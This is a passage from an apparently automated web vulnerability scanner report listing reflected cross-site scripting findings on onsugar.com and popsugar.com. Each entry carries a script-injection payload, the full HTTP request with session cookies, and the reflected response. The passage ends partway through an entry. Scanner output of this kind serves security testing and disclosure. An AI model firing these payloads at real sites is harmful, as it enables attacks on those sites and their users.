Content-Length: 8116

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6035900&c3=&c4=www.onsugar.com/statica4d96"><script>alert(1)</script>5c26a4aba3e/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36&c5=&c6=&c15=1c7d7144c7463cf0849f3154cfa5b81d&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

2.124. http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4626a"-alert(1)-"62698f08092 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /static4626a"-alert(1)-"62698f08092/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36?nids[]=1922398&p= HTTP/1.1
Host: www.onsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ss1=0%7C1317831675%7C1hzON%2FBtxw%2FSCTWuc9E0VzEd7ewMHVKNLgAYaD2MwleX5pc0bPQTAntYqpzAFqV01yTlYa%2FdPxdZGc0faXNdTWSGXo5pYGrMBdLoemKzNfmoJvotfETBMWiwVdyD7749Q19Xgek%2FoTWBurNkVhWVtGzkzfpHR0AMLNe2f9p8kAHRM2UqUmktKBfrRhwckev3goGEP4X44EFBnwqrI7jpEg%3D%3D%7C38bcbeecdf608d80f08c2ddda4e95201ecaec0a5; ss2=1

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web018-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: ss1=0%7C1317832642%7CPlX7exM%2F2VKT4xhnnXce4TwYjmyaLu5fXuolcj%2B39sgDSw9zzrwXiF6yXituIHWATQkjYJVp9AbgdMJ6szw875Gkx%2BuAvXudo7leHhX%2F8iJMk%2BxPhd39jzHp6Hem%2FCHJbPzTI1P6Np4wskedc4UjSxjRf6D6vWf5VxS4%2Fk66DYdDvmuNF9Y8D3NTG%2BCe1AZ9tj83XQw%2Fsdfm2z17mlTlnA%3D%3D%7C32acfef3993955b12c9f4ef4b50c4912e752e802; expires=Wed, 05-Oct-2011 16:37:22 GMT; path=/; httponly
Date: Mon, 12 Sep 2011 13:04:02 GMT
Server: lighttpd/1.4.26
Content-Length: 8011

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.
...[SNIP]...
<script>
var comscoreHash = "1c7d7144c7463cf0849f3154cfa5b81d";
COMSCORE.beacon({
c1:2,
c2:6035900,
c3:"",
c4:"www.onsugar.com/static4626a"-alert(1)-"62698f08092/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36",
c5:"",
c6:"",
c15:comscoreHash
});
</script>
...[SNIP]...

2.125. http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4dc9e"><script>alert(1)</script>b1683b2d7ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /static/4c964%22%3E%3Cscript%3Ealert(1)%3C4dc9e"><script>alert(1)</script>b1683b2d7ca/script%3Efa900ede36?nids[]=1922398&p= HTTP/1.1
Host: www.onsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ss1=0%7C1317831675%7C1hzON%2FBtxw%2FSCTWuc9E0VzEd7ewMHVKNLgAYaD2MwleX5pc0bPQTAntYqpzAFqV01yTlYa%2FdPxdZGc0faXNdTWSGXo5pYGrMBdLoemKzNfmoJvotfETBMWiwVdyD7749Q19Xgek%2FoTWBurNkVhWVtGzkzfpHR0AMLNe2f9p8kAHRM2UqUmktKBfrRhwckev3goGEP4X44EFBnwqrI7jpEg%3D%3D%7C38bcbeecdf608d80f08c2ddda4e95201ecaec0a5; ss2=1

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web016-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: ss1=0%7C1317832644%7Cio2s1Ow5Ncf%2F%2Fl6lcs9xNKXmSCTELGwjgZ%2B30%2BsL%2BBCsKQ1Lv54pc%2FiTc5iX8SFFQIvOXkLhf5bYPeelsJvscy7uLqQZebvK0VYAgwAB42NGUQCNrwF76WrK6%2BnbwWxK92zuu7fijHl8EuYS7xUwWG%2BfIx9RaVwSB%2B3C2MU6z1Qttn6Ir8ABR0cuSKocRVI68BI1Gi56KXlH5tGAHh5KIg%3D%3D%7C97a9f8778b10895f16abe7ced926ed84d50e8017; expires=Wed, 05-Oct-2011 16:37:24 GMT; path=/; httponly
Date: Mon, 12 Sep 2011 13:04:04 GMT
Server: lighttpd/1.4.26
Content-Length: 8116

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6035900&c3=&c4=www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C4dc9e"><script>alert(1)</script>b1683b2d7ca/script%3Efa900ede36&c5=&c6=&c15=1c7d7144c7463cf0849f3154cfa5b81d&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

2.126. http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4217b"-alert(1)-"1a7cc52b4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /static/4c964%22%3E%3Cscript%3Ealert(1)%3C4217b"-alert(1)-"1a7cc52b4/script%3Efa900ede36?nids[]=1922398&p= HTTP/1.1
Host: www.onsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ss1=0%7C1317831675%7C1hzON%2FBtxw%2FSCTWuc9E0VzEd7ewMHVKNLgAYaD2MwleX5pc0bPQTAntYqpzAFqV01yTlYa%2FdPxdZGc0faXNdTWSGXo5pYGrMBdLoemKzNfmoJvotfETBMWiwVdyD7749Q19Xgek%2FoTWBurNkVhWVtGzkzfpHR0AMLNe2f9p8kAHRM2UqUmktKBfrRhwckev3goGEP4X44EFBnwqrI7jpEg%3D%3D%7C38bcbeecdf608d80f08c2ddda4e95201ecaec0a5; ss2=1

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web017-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: ss1=0%7C1317832645%7CFOnqvD5UU3%2BUJgXtp2jPLd00CihayQtMbrH4XGUffzXA5zB7bhttXGMIFXU1fS1UgZz8Czaxf2aEQ7OOvGv3H5A7e2KdLho551ayNhJBe7uuasmqhM9z7eqWwr0PMT9wtID0JdyilKZu6XUoJjIKl25uXVopt2hpgs46jICOno6xXzuSlDiazg6tbKjGtziEZkG3nGgRR2hKvL7XAJWH%2BQ%3D%3D%7C670bb0a18cfd2ae29f1ecf51d7bd68f46414fc49; expires=Wed, 05-Oct-2011 16:37:25 GMT; path=/; httponly
Date: Mon, 12 Sep 2011 13:04:05 GMT
Server: lighttpd/1.4.26
Content-Length: 8001

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.
...[SNIP]...
<script>
var comscoreHash = "1c7d7144c7463cf0849f3154cfa5b81d";
COMSCORE.beacon({
c1:2,
c2:6035900,
c3:"",
c4:"www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C4217b"-alert(1)-"1a7cc52b4/script%3Efa900ede36",
c5:"",
c6:"",
c15:comscoreHash
});
</script>
...[SNIP]...

2.127. http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b281b"-alert(1)-"dce851da1d6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36b281b"-alert(1)-"dce851da1d6?nids[]=1922398&p= HTTP/1.1
Host: www.onsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ss1=0%7C1317831675%7C1hzON%2FBtxw%2FSCTWuc9E0VzEd7ewMHVKNLgAYaD2MwleX5pc0bPQTAntYqpzAFqV01yTlYa%2FdPxdZGc0faXNdTWSGXo5pYGrMBdLoemKzNfmoJvotfETBMWiwVdyD7749Q19Xgek%2FoTWBurNkVhWVtGzkzfpHR0AMLNe2f9p8kAHRM2UqUmktKBfrRhwckev3goGEP4X44EFBnwqrI7jpEg%3D%3D%7C38bcbeecdf608d80f08c2ddda4e95201ecaec0a5; ss2=1

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web015-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: ss1=0%7C1317832648%7CS1ct4OelR%2FlO6%2F4TyK3kytYnTtHD2WAkTX9w6edSBh%2BhWeYJBSuQq%2F4ZudckOlNHnYcd3Yg6YA8etZBDdntye8s%2ByoyXo1Cwwuim2ivs2IR7%2FvbA3aM29%2FBrTb3EkoCi7OP%2BqOkQFP%2Ff6%2FgXHOEkNdZlhi4HS0nAfVYjAZ3bbPKqJRJQ1wEUb3gWVsyNHOcas1yiVywhkZcrS2TMEugGrg%3D%3D%7Cb41abd34caa2ce189f969af07b306fc0a82ebb95; expires=Wed, 05-Oct-2011 16:37:28 GMT; path=/; httponly
Date: Mon, 12 Sep 2011 13:04:08 GMT
Server: lighttpd/1.4.26
Content-Length: 8011

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.
...[SNIP]...
>
var comscoreHash = "1c7d7144c7463cf0849f3154cfa5b81d";
COMSCORE.beacon({
c1:2,
c2:6035900,
c3:"",
c4:"www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36b281b"-alert(1)-"dce851da1d6",
c5:"",
c6:"",
c15:comscoreHash
});
</script>
...[SNIP]...

2.128. http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d58f"><script>alert(1)</script>358ef49d22c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede364d58f"><script>alert(1)</script>358ef49d22c?nids[]=1922398&p= HTTP/1.1
Host: www.onsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ss1=0%7C1317831675%7C1hzON%2FBtxw%2FSCTWuc9E0VzEd7ewMHVKNLgAYaD2MwleX5pc0bPQTAntYqpzAFqV01yTlYa%2FdPxdZGc0faXNdTWSGXo5pYGrMBdLoemKzNfmoJvotfETBMWiwVdyD7749Q19Xgek%2FoTWBurNkVhWVtGzkzfpHR0AMLNe2f9p8kAHRM2UqUmktKBfrRhwckev3goGEP4X44EFBnwqrI7jpEg%3D%3D%7C38bcbeecdf608d80f08c2ddda4e95201ecaec0a5; ss2=1

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web018-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: ss1=0%7C1317832647%7CU%2B8KzzGTQDjsyinyxAa5%2FZ2X%2BbF7Ne1pn4rOi%2FO6TkYNHR6ZyOb2a6K1KzAvYfho%2BFqPSlApJzMA1LnLKd4g2hT8Al1%2B%2BUUTxEX3QLGVI%2FVo4nzECvqe9ys%2F7kmnuItNKTr69DNqakEOSfuj5I3HkR8hUMOJJ3H3qPT5bI3kLNvxaBSuOoktB28ILYCaywW%2BkhYj72OcbewWZYoyVv0xKA%3D%3D%7C3b2fc535e94955b0ae945f747c82a641a36ca1a6; expires=Wed, 05-Oct-2011 16:37:27 GMT; path=/; httponly
Date: Mon, 12 Sep 2011 13:04:07 GMT
Server: lighttpd/1.4.26
Content-Length: 8116

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6035900&c3=&c4=www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede364d58f"><script>alert(1)</script>358ef49d22c&c5=&c6=&c15=1c7d7144c7463cf0849f3154cfa5b81d&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

2.129. http://www.onsugar.com/static/ck.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /static/ck.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 505a1"-alert(1)-"c8a5c0fff23 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /static/505a1"-alert(1)-"c8a5c0fff23?nids[]=1922398&p= HTTP/1.1
Host: www.onsugar.com
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/community/welcome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web016-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: ss1=0%7C1317831676%7CFWuR3rvfbbY5%2FMDWsCLoTMrE%2FIO9JaMIyUtnAkEQfmXmsJKlgNvmVB6d8yuUQtJKZt5QbQCsVFCvk7vrABwb9YS16L90KsGRkmt2iu5RQUTt%2B2X8Wx2VM%2BktODGDYumTvLgAdDZozVeZgyEbFbs6xM%2FHtEXyK3xwhgU0h%2B%2B2aXLTxDKxn6Fir8ipbCbqRgr9fm0q1TjWwitCn36M9IPJMw%3D%3D%7Ca14adba45dd6721dd7e44ec9b081d759f64dc04a; expires=Wed, 05-Oct-2011 16:21:16 GMT; path=/; httponly
Connection: close
Date: Mon, 12 Sep 2011 12:47:56 GMT
Server: lighttpd/1.4.26
Content-Length: 7687

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.
...[SNIP]...
<script>
var comscoreHash = "a5109bd915fbacdba358a709224af1dd";
COMSCORE.beacon({
c1:2,
c2:6035900,
c3:"",
c4:"www.onsugar.com/static/505a1"-alert(1)-"c8a5c0fff23",
c5:"",
c6:"",
c15:comscoreHash
});
</script>
...[SNIP]...

2.130. http://www.onsugar.com/static/ck.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /static/ck.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c964"><script>alert(1)</script>fa900ede36 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /static/4c964"><script>alert(1)</script>fa900ede36?nids[]=1922398&p= HTTP/1.1
Host: www.onsugar.com
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/community/welcome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web017-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: ss1=0%7C1317831675%7C1hzON%2FBtxw%2FSCTWuc9E0VzEd7ewMHVKNLgAYaD2MwleX5pc0bPQTAntYqpzAFqV01yTlYa%2FdPxdZGc0faXNdTWSGXo5pYGrMBdLoemKzNfmoJvotfETBMWiwVdyD7749Q19Xgek%2FoTWBurNkVhWVtGzkzfpHR0AMLNe2f9p8kAHRM2UqUmktKBfrRhwckev3goGEP4X44EFBnwqrI7jpEg%3D%3D%7C38bcbeecdf608d80f08c2ddda4e95201ecaec0a5; expires=Wed, 05-Oct-2011 16:21:15 GMT; path=/; httponly
Connection: close
Date: Mon, 12 Sep 2011 12:47:55 GMT
Server: lighttpd/1.4.26
Content-Length: 7787

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6035900&c3=&c4=www.onsugar.com/static/4c964"><script>alert(1)</script>fa900ede36&c5=&c6=&c15=a5109bd915fbacdba358a709224af1dd&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

2.131. http://www.popsugar.com/ajaxharness [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.popsugar.com
Path:   /ajaxharness

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fbf1"><script>alert(1)</script>0838c82964a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ajaxharness9fbf1"><script>alert(1)</script>0838c82964a?harness_requests=%7B%22replacements%22%3A%20%5B%7B%22sugar-menu-subnav-items%22%3A%20%22%2Fsugar-subnav-items%3Ffastcache%3D1%26fg_locale%3D0%22%7D%2C%20%7B%22user-feedback-div%22%3A%20%22%2Fsugar-user-feedback-form%3Fissue%3Dinfinite%2520scroll%22%7D%5D%2C%20%22callbacks%22%3A%20%5B%5D%7D HTTP/1.1
Host: www.popsugar.com
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/community/welcome
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rgk07unke60dp2tedj974stul0; fg_locale=0; client_locale=US; ss2=1; ss1=0%7C1317831674%7CRagyRv6hjbcv%2BGtix0C%2BY4dZ%2F8up68nRfzD4hbTVJBtLKOdC9xxftl3zJEUp7PTXP7qOJ1rs89814sy0hA%2FhkWfj%2F6FYRRgjcZ7uYzsAu14cgul99JwUy0Kis%2Fl2K6pjxO7fH3L5Yl2w0cFgoiMgsQg05%2Fln38Dqgc7S0rs%2FlyS8PCFHteE3YwC%2FgNJuFInmhXdLJrkS%2Bv3FBz8ipIK%2B1Q%3D%3D%7C4094d27d0c2101a64c637dc9108f2ed72f88c0c4; sugarTestGroup=control; __utma=18816312.1919955106.1315849692.1315849692.1315849692.1; __utmb=18816312.2.10.1315849692; __utmc=18816312; __utmz=18816312.1315849692.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __qca=P0-1520096207-1315849692025

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web014-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Server: lighttpd/1.4.26
Content-Length: 216779
Date: Mon, 12 Sep 2011 12:48:03 GMT
Connection: close
Set-Cookie: ss1=0%7C1317831683%7CW7Cc04oKuS%2FFL%2FWDuqxqWUgvLzSfjJaKze7pGoBWOfj6s2o1LE3eGfCCVh6dEpmmV2AqDKGuc4L4PrYYB9Gomsr0m%2BEcEWErb1f5kWM5HmkwZULLF3xDsI5uyNEH2Jvs%2Fl1%2Ftysqnay5H1Ze7gRVfIw0FpM90oXY%2BbhvF1KEzc%2FVlrr1qTRDS3912fXNIHvpbXKpvqVvrtRkgTfFZKpywQ%3D%3D%7Ca957e63a43c4911b378534156090709ab5a6580f; expires=Wed, 05-Oct-2011 16:21:23 GMT; path=/; httponly

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbm
...[SNIP]...
<link rel="canonical" href="http://www.popsugar.com/ajaxharness9fbf1"><script>alert(1)</script>0838c82964a?harness_requests=%7B%22replacements%22%3A+%5B%7B%22sugar-menu-subnav-items%22%3A+%22%2Fsugar-subnav-items%3Ffastcache%3D1%26fg_locale%3D0%22%7D%2C+%7B%22user-feedback-div%22%3A+%22%2Fsugar-user-feedba
...[SNIP]...

2.132. http://www.popsugar.com/ajaxharness [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.popsugar.com
Path:   /ajaxharness

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1274b"-alert(1)-"faa5baba69b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

